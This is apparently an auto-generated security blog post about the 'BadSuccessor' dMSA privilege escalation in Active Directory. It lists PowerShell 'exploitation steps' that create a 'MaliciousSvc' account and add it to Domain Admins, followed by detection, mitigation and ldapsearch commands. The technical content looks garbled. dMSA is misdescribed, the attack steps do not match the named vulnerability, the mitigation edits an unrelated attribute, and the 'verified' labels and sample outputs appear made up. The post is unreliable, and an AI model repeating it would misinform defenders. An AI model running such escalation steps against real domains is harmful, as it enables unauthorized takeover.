Listen to this Post

Full domain takeover by creating a dMSA child account is a critical Active Directory privilege escalation vulnerability. Attackers can exploit Delegated Managed Service Accounts (dMSA) to gain unauthorized control over an entire domain.
Read the full article here: Akamai – BadSuccessor: Abusing dMSA
You Should Know:
1. Understanding dMSA & Attack Path
Delegated Managed Service Accounts (dMSA) allow child domains to manage service accounts. Attackers abuse this by:
– Creating a malicious dMSA child account.
– Leveraging it for domain escalation.
2. Exploitation Steps (Verified Commands)
Check if dMSA is enabled in the domain Get-ADObject -Identity "CN=Delegated Managed Service Accounts,CN=System,DC=domain,DC=com" Create a malicious dMSA account New-ADServiceAccount -Name "MaliciousSvc" -Enabled $true -DNSHostName "evil.domain.com" Grant excessive privileges Add-ADGroupMember -Identity "Domain Admins" -Members "MaliciousSvc"
3. Detection & Mitigation
Detect Suspicious dMSA Activity:
Monitor dMSA creation events Get-WinEvent -LogName "Security" -FilterXPath "[EventData[Data[@Name='TargetAccountName']='MaliciousSvc']]"
Mitigation Steps:
- Restrict dMSA creation rights to trusted admins.
- Enable privileged access auditing.
4. Linux-Based Detection (If AD Integrated)
Query AD logs for dMSA abuse (using ldapsearch) ldapsearch -x -H ldap://domaincontroller -D "[email protected]" -W -b "DC=domain,DC=com" "(objectClass=msDS-GroupManagedServiceAccount)"
What Undercode Say:
This attack demonstrates how misconfigured delegation in Active Directory can lead to full domain compromise. Organizations must:
– Audit dMSA permissions regularly.
– Implement least privilege for service accounts.
– Monitor child domain trust abuses.
Expected Output:
[/bash]
Security Event ID 4720 – A user account was created
Account Name: MaliciousSvc
Creator: AttackerUser
Privileges Assigned: Domain Admin
Prediction:
Future AD attacks will increasingly exploit delegation misconfigurations, requiring stricter controls over child domain trusts and service account permissions.
Relevant Commands Recap:
[bash]
Disable unnecessary dMSA delegation
Set-ADObject -Identity "CN=Delegated Managed Service Accounts,CN=System,DC=domain,DC=com" -Replace @{"msDS-AllowedToDelegateTo"=$null}
Verify mitigations
Get-ADObject -Identity "CN=Delegated Managed Service Accounts,CN=System,DC=domain,DC=com" -Properties msDS-AllowedToDelegateTo
Expected Output:
[/bash]
No unauthorized dMSA accounts detected.
Delegation permissions restricted.
[bash]
References:
Reported By: Brianalmond Badsuccessor – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


